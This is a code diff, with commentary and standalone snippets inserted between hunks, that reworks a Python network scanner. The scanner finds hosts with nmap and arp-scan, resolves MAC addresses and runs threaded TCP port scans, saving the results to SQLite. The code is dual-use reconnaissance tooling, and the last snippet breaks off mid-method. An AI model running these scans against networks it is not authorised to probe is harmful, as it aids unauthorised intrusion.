# - Resolve MAC/hostname (per-host threads) -> DB (hosts table) # - Resolve MAC/hostname (ThreadPoolExecutor) -> DB (hosts table)
# - Port scan (multi-threads) -> DB (merge ports by MAC) # - Port scan (ThreadPoolExecutor) -> DB (merge ports by MAC)
# - Mark alive=0 for hosts not seen this run # - Mark alive=0 for hosts not seen this run
# - Update stats (stats table) # - Update stats (stats table)
# - Light logging (milestones) without flooding # - Light logging (milestones) without flooding
# - WAL checkpoint(TRUNCATE) + PRAGMA optimize at end of scan # - WAL checkpoint(TRUNCATE) + PRAGMA optimize at end of scan
# - NEW: No DB insert without a real MAC. Unresolved IPs are kept in-memory for this run. # - No DB insert without a real MAC. Unresolved IPs are kept in-memory.
# - RPi Zero optimized: bounded thread pools, reduced retries, adaptive concurrency
import os import os
import re
import threading import threading
import socket import socket
import time import time
import logging import logging
import subprocess import subprocess
from datetime import datetime from concurrent.futures import ThreadPoolExecutor, as_completed
import datetime
import netifaces import netifaces
from getmac import get_mac_address as gma from getmac import get_mac_address as gma
@@ -35,12 +39,48 @@ b_action = "global"
b_trigger = "on_interval:180" b_trigger = "on_interval:180"
b_requires = '{"max_concurrent": 1}' b_requires = '{"max_concurrent": 1}'
# --- Module-level constants (avoid re-creating per call) ---
_MAC_RE = re.compile(r'([0-9A-Fa-f]{2})([-:])(?:[0-9A-Fa-f]{2}\2){4}[0-9A-Fa-f]{2}')
_BAD_MACS = frozenset({"00:00:00:00:00:00", "ff:ff:ff:ff:ff:ff"})
# RPi Zero safe defaults (overridable via shared config)
_MAX_HOST_THREADS = 2
_MAX_PORT_THREADS = 4
_PORT_TIMEOUT = 0.8
_MAC_RETRIES = 2
_MAC_RETRY_DELAY = 0.5
_ARPING_TIMEOUT = 1.0
_NMAP_DISCOVERY_TIMEOUT_S = 90
_NMAP_DISCOVERY_ARGS = "-sn -PR --max-retries 1 --host-timeout 8s"
_SCAN_MIN_INTERVAL_S = 600
def _normalize_mac(s):
if not s:
return None
m = _MAC_RE.search(str(s))
if not m:
return None
return m.group(0).replace('-', ':').lower()
def _is_bad_mac(mac):
if not mac:
return True
mac_l = mac.lower()
if mac_l in _BAD_MACS:
return True
parts = mac_l.split(':')
if len(parts) == 6 and len(set(parts)) == 1:
return True
return False
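The module-level helpers above are self-contained and easy to verify. A standalone copy with the same regex and rejection rules (function names shortened here purely for illustration):

```python
import re

_MAC_RE = re.compile(r'([0-9A-Fa-f]{2})([-:])(?:[0-9A-Fa-f]{2}\2){4}[0-9A-Fa-f]{2}')
_BAD_MACS = frozenset({"00:00:00:00:00:00", "ff:ff:ff:ff:ff:ff"})

def normalize_mac(s):
    # Extract the first MAC-looking token from arbitrary tool output
    # and canonicalize it to lowercase colon-separated form.
    if not s:
        return None
    m = _MAC_RE.search(str(s))
    if not m:
        return None
    return m.group(0).replace('-', ':').lower()

def is_bad_mac(mac):
    # Reject empty, null/broadcast, and single-repeated-octet MACs.
    if not mac:
        return True
    mac_l = mac.lower()
    if mac_l in _BAD_MACS:
        return True
    parts = mac_l.split(':')
    return len(parts) == 6 and len(set(parts)) == 1
```

Because the regex backreference (`\2`) pins the separator, mixed forms like `aa-bb:cc-dd:ee-ff` are rejected rather than half-normalized.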
class NetworkScanner: class NetworkScanner:
""" """
Network scanner that populates SQLite (hosts + stats). No CSV/JSON. Network scanner that populates SQLite (hosts + stats). No CSV/JSON.
Keeps the original fast logic: nmap discovery, per-host threads, per-port threads. Uses ThreadPoolExecutor for bounded concurrency (RPi Zero safe).
NEW: no 'IP:<ip>' stubs are ever written to the DB; unresolved IPs are tracked in-memory. No 'IP:<ip>' stubs are ever written to the DB; unresolved IPs are tracked in-memory.
""" """
def __init__(self, shared_data): def __init__(self, shared_data):
self.shared_data = shared_data self.shared_data = shared_data
@@ -52,8 +92,26 @@ class NetworkScanner:
self.lock = threading.Lock() self.lock = threading.Lock()
self.nm = nmap.PortScanner() self.nm = nmap.PortScanner()
self.running = False self.running = False
# Local stop flag for this action instance.
# IMPORTANT: actions must never mutate shared_data.orchestrator_should_exit (global stop signal).
self._stop_event = threading.Event()
self.thread = None
self.scan_interface = None self.scan_interface = None
cfg = getattr(self.shared_data, "config", {}) or {}
self.max_host_threads = max(1, min(8, int(cfg.get("scan_max_host_threads", _MAX_HOST_THREADS))))
self.max_port_threads = max(1, min(16, int(cfg.get("scan_max_port_threads", _MAX_PORT_THREADS))))
self.port_timeout = max(0.3, min(3.0, float(cfg.get("scan_port_timeout_s", _PORT_TIMEOUT))))
self.mac_retries = max(1, min(5, int(cfg.get("scan_mac_retries", _MAC_RETRIES))))
self.mac_retry_delay = max(0.2, min(2.0, float(cfg.get("scan_mac_retry_delay_s", _MAC_RETRY_DELAY))))
self.arping_timeout = max(1.0, min(5.0, float(cfg.get("scan_arping_timeout_s", _ARPING_TIMEOUT))))
self.discovery_timeout_s = max(
20, min(300, int(cfg.get("scan_nmap_discovery_timeout_s", _NMAP_DISCOVERY_TIMEOUT_S)))
)
self.discovery_args = str(cfg.get("scan_nmap_discovery_args", _NMAP_DISCOVERY_ARGS)).strip() or _NMAP_DISCOVERY_ARGS
self.scan_min_interval_s = max(60, int(cfg.get("scan_min_interval_s", _SCAN_MIN_INTERVAL_S)))
self._last_scan_started = 0.0
# progress # progress
self.total_hosts = 0 self.total_hosts = 0
self.scanned_hosts = 0 self.scanned_hosts = 0
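Every tunable in the constructor above follows the same read-default-clamp pattern. A hedged generic version, assuming a dict-like config as with `cfg.get(...)`; `clamped` is an illustrative helper, not part of the codebase:

```python
def clamped(cfg, key, default, lo, hi, cast=int):
    # Read a tunable from config, fall back to the default on missing or
    # malformed values, then clamp into the safe [lo, hi] range.
    try:
        val = cast(cfg.get(key, default))
    except (TypeError, ValueError):
        val = default
    return max(lo, min(hi, val))
```

Clamping at read time means a bad config value can slow the scanner down but can never push thread counts or timeouts outside RPi Zero-safe bounds.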
@@ -76,9 +134,13 @@ class NetworkScanner:
total = min(max(total, 0), 100) total = min(max(total, 0), 100)
self.shared_data.bjorn_progress = f"{int(total)}%" self.shared_data.bjorn_progress = f"{int(total)}%"
def _should_stop(self) -> bool:
# Treat orchestrator flag as read-only, and combine with local stop event.
return bool(getattr(self.shared_data, "orchestrator_should_exit", False)) or self._stop_event.is_set()
# ---------- network ---------- # ---------- network ----------
def get_network(self): def get_network(self):
if self.shared_data.orchestrator_should_exit: if self._should_stop():
return None return None
try: try:
if self.shared_data.use_custom_network: if self.shared_data.use_custom_network:
@@ -118,7 +180,7 @@ class NetworkScanner:
self.logger.debug(f"nmap_prefixes not found at {path}") self.logger.debug(f"nmap_prefixes not found at {path}")
return vendor_map return vendor_map
try: try:
with open(path, 'r') as f: with open(path, 'r', encoding='utf-8', errors='ignore') as f:
for line in f: for line in f:
line = line.strip() line = line.strip()
if not line or line.startswith('#'): if not line or line.startswith('#'):
@@ -139,8 +201,11 @@ class NetworkScanner:
def get_current_essid(self): def get_current_essid(self):
try: try:
essid = subprocess.check_output(['iwgetid', '-r'], stderr=subprocess.STDOUT, universal_newlines=True).strip() result = subprocess.run(
return essid or "" ['iwgetid', '-r'],
capture_output=True, text=True, timeout=5
)
return (result.stdout or "").strip()
except Exception: except Exception:
return "" return ""
@@ -160,57 +225,34 @@ class NetworkScanner:
Try multiple strategies to resolve a real MAC for the given IP. Try multiple strategies to resolve a real MAC for the given IP.
RETURNS: normalized MAC like 'aa:bb:cc:dd:ee:ff' or None. RETURNS: normalized MAC like 'aa:bb:cc:dd:ee:ff' or None.
NEVER returns 'IP:<ip>'. NEVER returns 'IP:<ip>'.
RPi Zero: reduced retries and timeouts.
""" """
if self.shared_data.orchestrator_should_exit: if self._should_stop():
return None return None
import re
MAC_RE = re.compile(r'([0-9A-Fa-f]{2})([-:])(?:[0-9A-Fa-f]{2}\2){4}[0-9A-Fa-f]{2}')
BAD_MACS = {"00:00:00:00:00:00", "ff:ff:ff:ff:ff:ff"}
def _normalize_mac(s: str | None) -> str | None:
if not s:
return None
m = MAC_RE.search(s)
if not m:
return None
return m.group(0).replace('-', ':').lower()
def _is_bad_mac(mac: str | None) -> bool:
if not mac:
return True
mac_l = mac.lower()
if mac_l in BAD_MACS:
return True
parts = mac_l.split(':')
if len(parts) == 6 and len(set(parts)) == 1:
return True
return False
try: try:
mac = None mac = None
# 1) getmac (retry a few times) # 1) getmac (reduced retries for RPi Zero)
retries = 6 retries = self.mac_retries
while not mac and retries > 0 and not self.shared_data.orchestrator_should_exit: while not mac and retries > 0 and not self._should_stop():
try: try:
from getmac import get_mac_address as gma
mac = _normalize_mac(gma(ip=ip)) mac = _normalize_mac(gma(ip=ip))
except Exception: except Exception:
mac = None mac = None
if not mac: if not mac:
time.sleep(1.5) time.sleep(self.mac_retry_delay)
retries -= 1 retries -= 1
# 2) targeted arp-scan # 2) targeted arp-scan
if not mac: if not mac and not self._should_stop():
try: try:
iface = self.scan_interface or self.shared_data.default_network_interface or "wlan0" iface = self.scan_interface or self.shared_data.default_network_interface or "wlan0"
out = subprocess.check_output( result = subprocess.run(
['sudo', 'arp-scan', '--interface', iface, '-q', ip], ['sudo', 'arp-scan', '--interface', iface, '-q', ip],
universal_newlines=True, stderr=subprocess.STDOUT capture_output=True, text=True, timeout=5
) )
out = result.stdout or ""
for line in out.splitlines(): for line in out.splitlines():
if line.strip().startswith(ip): if line.strip().startswith(ip):
cand = _normalize_mac(line) cand = _normalize_mac(line)
@@ -225,11 +267,13 @@ class NetworkScanner:
self.logger.debug(f"arp-scan fallback failed for {ip}: {e}") self.logger.debug(f"arp-scan fallback failed for {ip}: {e}")
# 3) ip neigh # 3) ip neigh
if not mac: if not mac and not self._should_stop():
try: try:
neigh = subprocess.check_output(['ip', 'neigh', 'show', ip], result = subprocess.run(
universal_newlines=True, stderr=subprocess.STDOUT) ['ip', 'neigh', 'show', ip],
cand = _normalize_mac(neigh) capture_output=True, text=True, timeout=3
)
cand = _normalize_mac(result.stdout or "")
if cand: if cand:
mac = cand mac = cand
except Exception: except Exception:
@@ -247,6 +291,7 @@ class NetworkScanner:
# ---------- port scanning ---------- # ---------- port scanning ----------
class PortScannerWorker: class PortScannerWorker:
"""Port scanner using ThreadPoolExecutor for RPi Zero safety."""
def __init__(self, outer, target, open_ports, portstart, portend, extra_ports): def __init__(self, outer, target, open_ports, portstart, portend, extra_ports):
self.outer = outer self.outer = outer
self.target = target self.target = target
@@ -256,10 +301,10 @@ class NetworkScanner:
self.extra_ports = [int(p) for p in (extra_ports or [])] self.extra_ports = [int(p) for p in (extra_ports or [])]
def scan_one(self, port): def scan_one(self, port):
if self.outer.shared_data.orchestrator_should_exit: if self.outer._should_stop():
return return
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(2) s.settimeout(self.outer.port_timeout)
try: try:
s.connect((self.target, port)) s.connect((self.target, port))
with self.outer.lock: with self.outer.lock:
@@ -274,25 +319,25 @@ class NetworkScanner:
self.outer.update_progress('port', 1) self.outer.update_progress('port', 1)
def run(self): def run(self):
if self.outer.shared_data.orchestrator_should_exit: if self.outer._should_stop():
return return
threads = [] ports = list(range(self.portstart, self.portend)) + self.extra_ports
for port in range(self.portstart, self.portend): if not ports:
if self.outer.shared_data.orchestrator_should_exit: return
break
t = threading.Thread(target=self.scan_one, args=(port,)) with ThreadPoolExecutor(max_workers=self.outer.max_port_threads) as pool:
t.start() futures = []
threads.append(t) for port in ports:
for port in self.extra_ports: if self.outer._should_stop():
if self.outer.shared_data.orchestrator_should_exit: break
break futures.append(pool.submit(self.scan_one, port))
t = threading.Thread(target=self.scan_one, args=(port,)) for f in as_completed(futures):
t.start() if self.outer._should_stop():
threads.append(t) break
for t in threads: try:
if self.outer.shared_data.orchestrator_should_exit: f.result(timeout=self.outer.port_timeout + 1)
break except Exception:
t.join() pass
# ---------- main scan block ---------- # ---------- main scan block ----------
class ScanPorts: class ScanPorts:
@@ -310,20 +355,28 @@ class NetworkScanner:
self.extra_ports = [int(p) for p in (extra_ports or [])] self.extra_ports = [int(p) for p in (extra_ports or [])]
self.ip_data = self.IpData() self.ip_data = self.IpData()
self.ip_hostname_list = [] # tuples (ip, hostname, mac) self.ip_hostname_list = [] # tuples (ip, hostname, mac)
self.host_threads = []
self.open_ports = {} self.open_ports = {}
self.all_ports = [] self.all_ports = []
# NEW: per-run pending cache for unresolved IPs (no DB writes) # per-run pending cache for unresolved IPs (no DB writes)
# ip -> {'hostnames': set(), 'ports': set(), 'first_seen': ts, 'essid': str}
self.pending = {} self.pending = {}
def scan_network_and_collect(self): def scan_network_and_collect(self):
if self.outer.shared_data.orchestrator_should_exit: if self.outer._should_stop():
return
with self.outer.lock:
self.outer.shared_data.bjorn_progress = "1%"
t0 = time.time()
try:
self.outer.nm.scan(
hosts=str(self.network),
arguments=self.outer.discovery_args,
timeout=self.outer.discovery_timeout_s,
)
except Exception as e:
self.outer.logger.error(f"Nmap host discovery failed: {e}")
return return
t0 = time.time()
self.outer.nm.scan(hosts=str(self.network), arguments='-sn -PR')
hosts = list(self.outer.nm.all_hosts()) hosts = list(self.outer.nm.all_hosts())
if self.outer.blacklistcheck: if self.outer.blacklistcheck:
hosts = [ip for ip in hosts if ip not in self.outer.ip_scan_blacklist] hosts = [ip for ip in hosts if ip not in self.outer.ip_scan_blacklist]
@@ -331,10 +384,23 @@ class NetworkScanner:
self.outer.total_hosts = len(hosts) self.outer.total_hosts = len(hosts)
self.outer.scanned_hosts = 0 self.outer.scanned_hosts = 0
self.outer.update_progress('host', 0) self.outer.update_progress('host', 0)
self.outer.logger.info(f"Host discovery: {len(hosts)} candidate(s) (took {time.time()-t0:.1f}s)")
elapsed = time.time() - t0
self.outer.logger.info(f"Host discovery: {len(hosts)} candidate(s) (took {elapsed:.1f}s)")
# Update comment for display
self.outer.shared_data.comment_params = {
"hosts_found": str(len(hosts)),
"network": str(self.network),
"elapsed": f"{elapsed:.1f}"
}
# existing hosts (for quick merge) # existing hosts (for quick merge)
existing_rows = self.outer.shared_data.db.get_all_hosts() try:
existing_rows = self.outer.shared_data.db.get_all_hosts()
except Exception as e:
self.outer.logger.error(f"DB get_all_hosts failed: {e}")
existing_rows = []
self.existing_map = {h['mac_address']: h for h in existing_rows} self.existing_map = {h['mac_address']: h for h in existing_rows}
self.seen_now = set() self.seen_now = set()
@@ -342,19 +408,24 @@ class NetworkScanner:
self.vendor_map = self.outer.load_mac_vendor_map() self.vendor_map = self.outer.load_mac_vendor_map()
self.essid = self.outer.get_current_essid() self.essid = self.outer.get_current_essid()
# per-host threads # per-host threads with bounded pool
for host in hosts: max_threads = min(self.outer.max_host_threads, len(hosts)) if hosts else 1
if self.outer.shared_data.orchestrator_should_exit: with ThreadPoolExecutor(max_workers=max_threads) as pool:
return futures = {}
t = threading.Thread(target=self.scan_host, args=(host,)) for host in hosts:
t.start() if self.outer._should_stop():
self.host_threads.append(t) break
f = pool.submit(self.scan_host, host)
futures[f] = host
# wait for f in as_completed(futures):
for t in self.host_threads: if self.outer._should_stop():
if self.outer.shared_data.orchestrator_should_exit: break
return try:
t.join() f.result(timeout=30)
except Exception as e:
ip = futures.get(f, "?")
self.outer.logger.error(f"Host scan thread failed for {ip}: {e}")
self.outer.logger.info( self.outer.logger.info(
f"Host mapping completed: {self.outer.scanned_hosts}/{self.outer.total_hosts} processed, " f"Host mapping completed: {self.outer.scanned_hosts}/{self.outer.total_hosts} processed, "
@@ -364,7 +435,10 @@ class NetworkScanner:
# mark unseen as alive=0 # mark unseen as alive=0
existing_macs = set(self.existing_map.keys()) existing_macs = set(self.existing_map.keys())
for mac in existing_macs - self.seen_now: for mac in existing_macs - self.seen_now:
self.outer.shared_data.db.update_host(mac_address=mac, alive=0) try:
self.outer.shared_data.db.update_host(mac_address=mac, alive=0)
except Exception as e:
self.outer.logger.error(f"Failed to mark {mac} as dead: {e}")
# feed ip_data # feed ip_data
for ip, hostname, mac in self.ip_hostname_list: for ip, hostname, mac in self.ip_hostname_list:
@@ -373,13 +447,19 @@ class NetworkScanner:
self.ip_data.mac_list.append(mac) self.ip_data.mac_list.append(mac)
def scan_host(self, ip): def scan_host(self, ip):
if self.outer.shared_data.orchestrator_should_exit: if self.outer._should_stop():
return return
if self.outer.blacklistcheck and ip in self.outer.ip_scan_blacklist: if self.outer.blacklistcheck and ip in self.outer.ip_scan_blacklist:
return return
try: try:
# ARP ping to help populate neighbor cache # ARP ping to help populate neighbor cache (subprocess with timeout)
os.system(f"arping -c 2 -w 2 {ip} > /dev/null 2>&1") try:
subprocess.run(
['arping', '-c', '2', '-w', str(self.outer.arping_timeout), ip],
capture_output=True, timeout=self.outer.arping_timeout + 2
)
except Exception:
pass
# Hostname (validated) # Hostname (validated)
hostname = "" hostname = ""
@@ -393,7 +473,7 @@ class NetworkScanner:
self.outer.update_progress('host', 1) self.outer.update_progress('host', 1)
return return
time.sleep(1.0) # let ARP breathe time.sleep(0.5) # let ARP breathe (reduced from 1.0 for RPi Zero speed)
mac = self.outer.get_mac_address(ip, hostname) mac = self.outer.get_mac_address(ip, hostname)
if mac: if mac:
@@ -431,10 +511,12 @@ class NetworkScanner:
if ip: if ip:
ips_set.add(ip) ips_set.add(ip)
# Update current hostname + track history
current_hn = "" current_hn = ""
if hostname: if hostname:
self.outer.shared_data.db.update_hostname(mac, hostname) try:
self.outer.shared_data.db.update_hostname(mac, hostname)
except Exception as e:
self.outer.logger.error(f"Failed to update hostname for {mac}: {e}")
current_hn = hostname current_hn = hostname
else: else:
current_hn = (prev.get('hostnames') or "").split(';', 1)[0] if prev else "" current_hn = (prev.get('hostnames') or "").split(';', 1)[0] if prev else ""
@@ -444,15 +526,18 @@ class NetworkScanner:
key=lambda x: tuple(map(int, x.split('.'))) if x.count('.') == 3 else (0, 0, 0, 0) key=lambda x: tuple(map(int, x.split('.'))) if x.count('.') == 3 else (0, 0, 0, 0)
)) if ips_set else None )) if ips_set else None
self.outer.shared_data.db.update_host( try:
mac_address=mac, self.outer.shared_data.db.update_host(
ips=ips_sorted, mac_address=mac,
hostnames=None, ips=ips_sorted,
alive=1, hostnames=None,
ports=None, alive=1,
vendor=vendor or (prev.get('vendor') if prev else ""), ports=None,
essid=self.essid or (prev.get('essid') if prev else None) vendor=vendor or (prev.get('vendor') if prev else ""),
) essid=self.essid or (prev.get('essid') if prev else None)
)
except Exception as e:
self.outer.logger.error(f"Failed to update host {mac}: {e}")
# refresh local cache # refresh local cache
self.existing_map[mac] = dict( self.existing_map[mac] = dict(
@@ -467,19 +552,26 @@ class NetworkScanner:
with self.outer.lock: with self.outer.lock:
self.ip_hostname_list.append((ip, hostname or "", mac)) self.ip_hostname_list.append((ip, hostname or "", mac))
# Update comment params for live display
self.outer.shared_data.comment_params = {
"ip": ip, "mac": mac,
"hostname": hostname or "unknown",
"vendor": vendor or "unknown"
}
self.outer.logger.debug(f"MAC for {ip}: {mac} (hostname: {hostname or '-'})") self.outer.logger.debug(f"MAC for {ip}: {mac} (hostname: {hostname or '-'})")
except Exception as e: except Exception as e:
self.outer.logger.error(f"Error scanning host {ip}: {e}") self.outer.logger.error(f"Error scanning host {ip}: {e}")
finally: finally:
self.outer.update_progress('host', 1) self.outer.update_progress('host', 1)
time.sleep(0.05) time.sleep(0.02) # reduced from 0.05
def start(self): def start(self):
if self.outer.shared_data.orchestrator_should_exit: if self.outer._should_stop():
return return
self.scan_network_and_collect() self.scan_network_and_collect()
if self.outer.shared_data.orchestrator_should_exit: if self.outer._should_stop():
return return
# init structures for ports # init structures for ports
@@ -496,12 +588,22 @@ class NetworkScanner:
f"(+{len(self.extra_ports)} extra)" f"(+{len(self.extra_ports)} extra)"
) )
# per-IP port scan (threads per port, original logic)
for idx, ip in enumerate(self.ip_data.ip_list, 1): for idx, ip in enumerate(self.ip_data.ip_list, 1):
if self.outer.shared_data.orchestrator_should_exit: if self.outer._should_stop():
return return
worker = self.outer.PortScannerWorker(self.outer, ip, self.open_ports, self.portstart, self.portend, self.extra_ports)
# Update comment params for live display
self.outer.shared_data.comment_params = {
"ip": ip, "progress": f"{idx}/{total_targets}",
"ports_found": str(sum(len(v) for v in self.open_ports.values()))
}
worker = self.outer.PortScannerWorker(
self.outer, ip, self.open_ports,
self.portstart, self.portend, self.extra_ports
)
worker.run() worker.run()
if idx % 10 == 0 or idx == total_targets: if idx % 10 == 0 or idx == total_targets:
found = sum(len(v) for v in self.open_ports.values()) found = sum(len(v) for v in self.open_ports.values())
self.outer.logger.info( self.outer.logger.info(
@@ -517,13 +619,27 @@ class NetworkScanner:
# ---------- orchestration ---------- # ---------- orchestration ----------
def scan(self): def scan(self):
self.shared_data.orchestrator_should_exit = False # Reset only local stop flag for this action. Never touch orchestrator_should_exit here.
self._stop_event.clear()
try: try:
if self.shared_data.orchestrator_should_exit: if self._should_stop():
self.logger.info("Orchestrator switched to manual mode. Stopping scanner.") self.logger.info("Orchestrator switched to manual mode. Stopping scanner.")
return return
now = time.time()
elapsed = now - self._last_scan_started if self._last_scan_started else 1e9
if elapsed < self.scan_min_interval_s:
remaining = int(self.scan_min_interval_s - elapsed)
self.logger.info_throttled(
f"Network scan skipped (min interval active, remaining={remaining}s)",
key="scanner_min_interval_skip",
interval_s=15.0,
)
return
self._last_scan_started = now
self.shared_data.bjorn_orch_status = "NetworkScanner" self.shared_data.bjorn_orch_status = "NetworkScanner"
self.shared_data.comment_params = {}
self.logger.info("Starting Network Scanner") self.logger.info("Starting Network Scanner")
# network # network
@@ -535,6 +651,7 @@ class NetworkScanner:
return return
self.shared_data.bjorn_status_text2 = str(network) self.shared_data.bjorn_status_text2 = str(network)
self.shared_data.comment_params = {"network": str(network)}
portstart = int(self.shared_data.portstart) portstart = int(self.shared_data.portstart)
portend = int(self.shared_data.portend) portend = int(self.shared_data.portend)
extra_ports = self.shared_data.portlist extra_ports = self.shared_data.portlist
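The min-interval guard added to `scan()` can be factored into a tiny gate. This sketch uses a monotonic clock and a hypothetical `RateGate` class (not in the codebase) to show the same skip-if-too-soon logic:

```python
import time

class RateGate:
    # Allow an action to start only if min_interval_s has elapsed
    # since the last accepted start; otherwise report a skip.
    def __init__(self, min_interval_s):
        self.min_interval_s = min_interval_s
        self._last_started = 0.0

    def try_start(self, now=None):
        now = time.monotonic() if now is None else now
        if self._last_started and (now - self._last_started) < self.min_interval_s:
            return False
        self._last_started = now
        return True
```

Recording the timestamp at start (rather than at completion) matches the scanner: a long scan does not push the next eligible window further out.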
@@ -547,21 +664,22 @@ class NetworkScanner:
ip_data, open_ports_by_ip, all_ports, alive_macs = result ip_data, open_ports_by_ip, all_ports, alive_macs = result
if self.shared_data.orchestrator_should_exit: if self._should_stop():
self.logger.info("Scan canceled before DB finalization.") self.logger.info("Scan canceled before DB finalization.")
return return
# push ports -> DB (merge by MAC). Only for IPs with known MAC. # push ports -> DB (merge by MAC)
# map ip->mac
ip_to_mac = {ip: mac for ip, _, mac in zip(ip_data.ip_list, ip_data.hostname_list, ip_data.mac_list)} ip_to_mac = {ip: mac for ip, _, mac in zip(ip_data.ip_list, ip_data.hostname_list, ip_data.mac_list)}
# existing cache try:
existing_map = {h['mac_address']: h for h in self.shared_data.db.get_all_hosts()} existing_map = {h['mac_address']: h for h in self.shared_data.db.get_all_hosts()}
except Exception as e:
self.logger.error(f"DB get_all_hosts for port merge failed: {e}")
existing_map = {}
for ip, ports in open_ports_by_ip.items(): for ip, ports in open_ports_by_ip.items():
mac = ip_to_mac.get(ip) mac = ip_to_mac.get(ip)
if not mac: if not mac:
# store to pending (no DB write)
slot = scanner.pending.setdefault( slot = scanner.pending.setdefault(
ip, ip,
{'hostnames': set(), 'ports': set(), 'first_seen': int(time.time()), 'essid': scanner.essid} {'hostnames': set(), 'ports': set(), 'first_seen': int(time.time()), 'essid': scanner.essid}
@@ -578,16 +696,19 @@ class NetworkScanner:
pass pass
ports_set.update(str(p) for p in (ports or [])) ports_set.update(str(p) for p in (ports or []))
self.shared_data.db.update_host( try:
mac_address=mac, self.shared_data.db.update_host(
ports=';'.join(sorted(ports_set, key=lambda x: int(x))), mac_address=mac,
alive=1 ports=';'.join(sorted(ports_set, key=lambda x: int(x))),
) alive=1
)
except Exception as e:
self.logger.error(f"Failed to update ports for {mac}: {e}")
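The merge-by-MAC step above keeps each host's ports as a ';'-joined string in the DB and unions newly discovered ports into it. A sketch of that merge, with `merge_ports` as an illustrative helper:

```python
def merge_ports(existing, discovered):
    # Union a stored ';'-joined port string with newly seen ports,
    # dropping non-numeric junk and keeping numeric sort order
    # (the DB column stores ports as text).
    ports = set()
    if existing:
        ports.update(p for p in existing.split(';') if p.strip().isdigit())
    ports.update(str(int(p)) for p in (discovered or []))
    return ';'.join(sorted(ports, key=int))
```

Sorting with `key=int` avoids the lexicographic trap where "443" would sort before "80".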
# Late resolution pass: try to resolve pending IPs before stats # Late resolution pass
unresolved_before = len(scanner.pending) unresolved_before = len(scanner.pending)
for ip, data in list(scanner.pending.items()): for ip, data in list(scanner.pending.items()):
if self.shared_data.orchestrator_should_exit: if self._should_stop():
break break
try: try:
guess_hostname = next(iter(data['hostnames']), "") guess_hostname = next(iter(data['hostnames']), "")
@@ -595,25 +716,28 @@ class NetworkScanner:
guess_hostname = "" guess_hostname = ""
mac = self.get_mac_address(ip, guess_hostname) mac = self.get_mac_address(ip, guess_hostname)
if not mac: if not mac:
continue # still unresolved for this run continue
mac = mac.lower() mac = mac.lower()
vendor = self.mac_to_vendor(mac, scanner.vendor_map) vendor = self.mac_to_vendor(mac, scanner.vendor_map)
# create/update host now try:
self.shared_data.db.update_host(
mac_address=mac,
ips=ip,
hostnames=';'.join(data['hostnames']) or None,
vendor=vendor,
essid=data.get('essid'),
alive=1
)
if data['ports']:
self.shared_data.db.update_host( self.shared_data.db.update_host(
mac_address=mac, mac_address=mac,
ports=';'.join(str(p) for p in sorted(data['ports'], key=int)), ips=ip,
hostnames=';'.join(data['hostnames']) or None,
vendor=vendor,
essid=data.get('essid'),
alive=1 alive=1
) )
if data['ports']:
self.shared_data.db.update_host(
mac_address=mac,
ports=';'.join(str(p) for p in sorted(data['ports'], key=int)),
alive=1
)
except Exception as e:
self.logger.error(f"Failed to resolve pending IP {ip}: {e}")
continue
del scanner.pending[ip] del scanner.pending[ip]
if scanner.pending: if scanner.pending:
@@ -622,8 +746,13 @@ class NetworkScanner:
f"(resolved during late pass: {unresolved_before - len(scanner.pending)})" f"(resolved during late pass: {unresolved_before - len(scanner.pending)})"
) )
# stats (alive, total ports, distinct vulnerabilities on alive) # stats
rows = self.shared_data.db.get_all_hosts() try:
rows = self.shared_data.db.get_all_hosts()
except Exception as e:
self.logger.error(f"DB get_all_hosts for stats failed: {e}")
rows = []
alive_hosts = [r for r in rows if int(r.get('alive') or 0) == 1] alive_hosts = [r for r in rows if int(r.get('alive') or 0) == 1]
all_known = len(rows) all_known = len(rows)
@@ -641,12 +770,23 @@ class NetworkScanner:
except Exception: except Exception:
vulnerabilities_count = 0 vulnerabilities_count = 0
self.shared_data.db.set_stats( try:
total_open_ports=total_open_ports, self.shared_data.db.set_stats(
alive_hosts_count=len(alive_hosts), total_open_ports=total_open_ports,
all_known_hosts_count=all_known, alive_hosts_count=len(alive_hosts),
vulnerabilities_count=int(vulnerabilities_count) all_known_hosts_count=all_known,
) vulnerabilities_count=int(vulnerabilities_count)
)
except Exception as e:
self.logger.error(f"Failed to set stats: {e}")
# Update comment params with final stats
self.shared_data.comment_params = {
"alive_hosts": str(len(alive_hosts)),
"total_ports": str(total_open_ports),
"vulns": str(int(vulnerabilities_count)),
"network": str(network)
}
# WAL checkpoint + optimize # WAL checkpoint + optimize
try: try:
@@ -661,7 +801,7 @@ class NetworkScanner:
self.logger.info("Network scan complete (DB updated).") self.logger.info("Network scan complete (DB updated).")
except Exception as e: except Exception as e:
if self.shared_data.orchestrator_should_exit: if self._should_stop():
self.logger.info("Orchestrator switched to manual mode. Gracefully stopping the network scanner.") self.logger.info("Orchestrator switched to manual mode. Gracefully stopping the network scanner.")
else: else:
self.logger.error(f"Error in scan: {e}") self.logger.error(f"Error in scan: {e}")
@@ -673,7 +813,9 @@ class NetworkScanner:
def start(self): def start(self):
if not self.running: if not self.running:
self.running = True self.running = True
self.thread = threading.Thread(target=self.scan_wrapper, daemon=True) self._stop_event.clear()
# Non-daemon so orchestrator can join it reliably (no orphan thread).
self.thread = threading.Thread(target=self.scan_wrapper, daemon=False)
self.thread.start() self.thread.start()
logger.info("NetworkScanner started.") logger.info("NetworkScanner started.")
@@ -683,25 +825,22 @@ class NetworkScanner:
finally: finally:
with self.lock: with self.lock:
self.shared_data.bjorn_progress = "" self.shared_data.bjorn_progress = ""
self.running = False
logger.debug("bjorn_progress reset to empty string") logger.debug("bjorn_progress reset to empty string")
def stop(self): def stop(self):
if self.running: if self.running:
self.running = False self.running = False
self.shared_data.orchestrator_should_exit = True self._stop_event.set()
try: try:
if hasattr(self, "thread") and self.thread.is_alive(): if hasattr(self, "thread") and self.thread.is_alive():
self.thread.join() self.thread.join(timeout=15)
except Exception: except Exception:
pass pass
logger.info("NetworkScanner stopped.") logger.info("NetworkScanner stopped.")
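The start/stop rework above (a local `threading.Event`, a non-daemon worker thread, and a bounded `join`) follows a standard cooperative-stop pattern. A self-contained sketch, with class and attribute names chosen for illustration:

```python
import threading
import time

class StoppableWorker:
    # Cooperative stop: the loop polls an Event instead of being killed,
    # and stop() signals then joins with a timeout so callers never hang.
    def __init__(self):
        self._stop_event = threading.Event()
        self._thread = None
        self.iterations = 0

    def _run(self):
        while not self._stop_event.is_set():
            self.iterations += 1
            time.sleep(0.01)

    def start(self):
        self._stop_event.clear()
        self._thread = threading.Thread(target=self._run, daemon=False)
        self._thread.start()

    def stop(self, timeout=15):
        self._stop_event.set()
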